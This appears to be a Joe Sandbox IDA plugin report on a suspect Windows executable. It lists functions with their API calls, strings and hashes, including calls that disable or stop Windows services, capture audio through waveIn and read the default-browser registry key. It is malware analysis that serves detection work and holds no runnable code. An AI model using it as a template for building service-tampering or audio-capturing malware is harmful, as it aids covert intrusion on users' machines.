__CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
__Init_thread_footer.LIBCMT ref: 0040F97F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID:
API String ID: 3815856325-0
Opcode ID: d4cae47439a6db20e6e842395f89b118dcd2d5e72d0233f265971a350c60e72c
Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
Opcode Fuzzy Hash: d4cae47439a6db20e6e842395f89b118dcd2d5e72d0233f265971a350c60e72c
Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9

Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: a76e1c7468ac1a528a5f09f4ab7ed87539506fcae765116f19c1494b4087f4ac
Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
Opcode Fuzzy Hash: a76e1c7468ac1a528a5f09f4ab7ed87539506fcae765116f19c1494b4087f4ac
Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9

Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
_free.LIBCMT ref: 0044575C
_free.LIBCMT ref: 00445784
SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
_abort.LIBCMT ref: 004457A3

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D

Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: fb4f283fb97628e5c831a0fb91a0bfb55e48429e11adbc6b559d9ac287613174
Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
Opcode Fuzzy Hash: fb4f283fb97628e5c831a0fb91a0bfb55e48429e11adbc6b559d9ac287613174
Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9

Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: c741640427e0191265b1ffb81d3cd69f3151aa6d5418963c48d2b2230fc0099d
Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
Opcode Fuzzy Hash: c741640427e0191265b1ffb81d3cd69f3151aa6d5418963c48d2b2230fc0099d
Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9

Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: d9582a11252cb8aea95f29102ce9ca99f1958b3c019a8481d53cf686773dbfa0
Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
Opcode Fuzzy Hash: d9582a11252cb8aea95f29102ce9ca99f1958b3c019a8481d53cf686773dbfa0
Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9

Function 0040184A Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040189E
ExitThread.KERNEL32 ref: 004018D6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

Strings

8:G, xrefs: 00401868
0zS, xrefs: 004018E2

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: 0zS$8:G
API String ID: 1649129571-675047323
Opcode ID: 8034329e0f87f2863c2184890033f37175777bc9733c74599dc8fbfb11b73b48
Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
Opcode Fuzzy Hash: 8034329e0f87f2863c2184890033f37175777bc9733c74599dc8fbfb11b73b48
Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E

Function 00440935 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DB5rQYsfd6.exe,00000104), ref: 00440975
_free.LIBCMT ref: 00440A40
_free.LIBCMT ref: 00440A4A

Strings

%R, xrefs: 0044097B
C:\Users\user\Desktop\DB5rQYsfd6.exe, xrefs: 0044096C, 00440973, 004409A2, 004409DA

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\DB5rQYsfd6.exe$%R
API String ID: 2506810119-216988873
Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59

Function 0044C138 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 0044C257: _abort.LIBCMT ref: 0044C289
Part of subcall function 0044C257: _free.LIBCMT ref: 0044C2BD

Part of subcall function 0044BECC: GetOEMCP.KERNEL32(00000000,?,?,0044C155,?), ref: 0044BEF7

_free.LIBCMT ref: 0044C1B0
_free.LIBCMT ref: 0044C1E6

Strings

pF, xrefs: 0044C1DA
KS, xrefs: 0044C22F
KS, xrefs: 0044C22A

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast_abort
String ID: pF$KS$KS
API String ID: 2991157371-1119215651
Opcode ID: 97d7db50b82cccbee5169bb68c5bf7844dd74d9bc7eda6e9766878cece535fa3
Instruction ID: fe15ecdc59135b682bea8f5676c8c6c36af8c828548cffef148b997f3b02a595
Opcode Fuzzy Hash: 97d7db50b82cccbee5169bb68c5bf7844dd74d9bc7eda6e9766878cece535fa3
Instruction Fuzzy Hash: 3431E931901104AFFB50EF9AD481B5A77F4DF40325F29409FE5149B252EB7A9D40CF48

Function 00419675 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,@8T,00471FFC), ref: 00412030
Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F3B

_wcslen.LIBCMT ref: 00419744

Strings

@8T, xrefs: 0041967D
program files (x86)\, xrefs: 0041973E
program files\, xrefs: 0041972A, 00419731, 00419743
.exe, xrefs: 00419696

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
String ID: .exe$@8T$program files (x86)\$program files\
API String ID: 3286818993-4115660052
Opcode ID: db6bdd67a7951637e261c990a77772a43d8ef49e9346aff36479599785361708
Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
Opcode Fuzzy Hash: db6bdd67a7951637e261c990a77772a43d8ef49e9346aff36479599785361708
Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9

Function 00440F33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

@!S, xrefs: 00440F36

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID: @!S
API String ID: 0-4045816191
Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568

Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6

Strings

h G, xrefs: 00409698

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: h G
API String ID: 1958988193-3300504347
Opcode ID: 64ddeb584e83f1d932ac6fa5b59c4334acd5bdbaabeabc2d1db5fab4724845ed
Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
Opcode Fuzzy Hash: 64ddeb584e83f1d932ac6fa5b59c4334acd5bdbaabeabc2d1db5fab4724845ed
Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E

Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041B310
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
GetLastError.KERNEL32 ref: 0041B335

Strings

0, xrefs: 0041B2E0
MsgWindowClass, xrefs: 0041B2DB

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 98acc1d12319c165810c3a8101ac83cded611685f47401b5bc5866d6e0782eef
Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
Opcode Fuzzy Hash: 98acc1d12319c165810c3a8101ac83cded611685f47401b5bc5866d6e0782eef
Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4

Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043761A

Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C

_UnwindNestedFrames.LIBCMT ref: 00437631
___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
CallCatchBlock.LIBVCRUNTIME ref: 00437667

Strings

/zC, xrefs: 00437626, 00437617

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: /zC
API String ID: 2633735394-4132788633
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98

Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 004173AA
GetSystemMetrics.USER32(0000004D), ref: 004173B0
GetSystemMetrics.USER32(0000004E), ref: 004173B6
GetSystemMetrics.USER32(0000004F), ref: 004173BC

Strings

]tA, xrefs: 004173EB

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID: ]tA
API String ID: 4116985748-3517819141
Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94

Function 00412006 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,@8T,00471FFC), ref: 00412030
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
RegCloseKey.ADVAPI32(00000000), ref: 00412054

Strings

@8T, xrefs: 00412010
http\shell\open\command, xrefs: 00412026

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: @8T$http\shell\open\command
API String ID: 3677997916-1831923547
Opcode ID: 02d9583b321f90b8fde47cd3c5079fbeabf7c3eeeb86fcf6652fd9b53942e913
Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
Opcode Fuzzy Hash: 02d9583b321f90b8fde47cd3c5079fbeabf7c3eeeb86fcf6652fd9b53942e913
Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5

Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

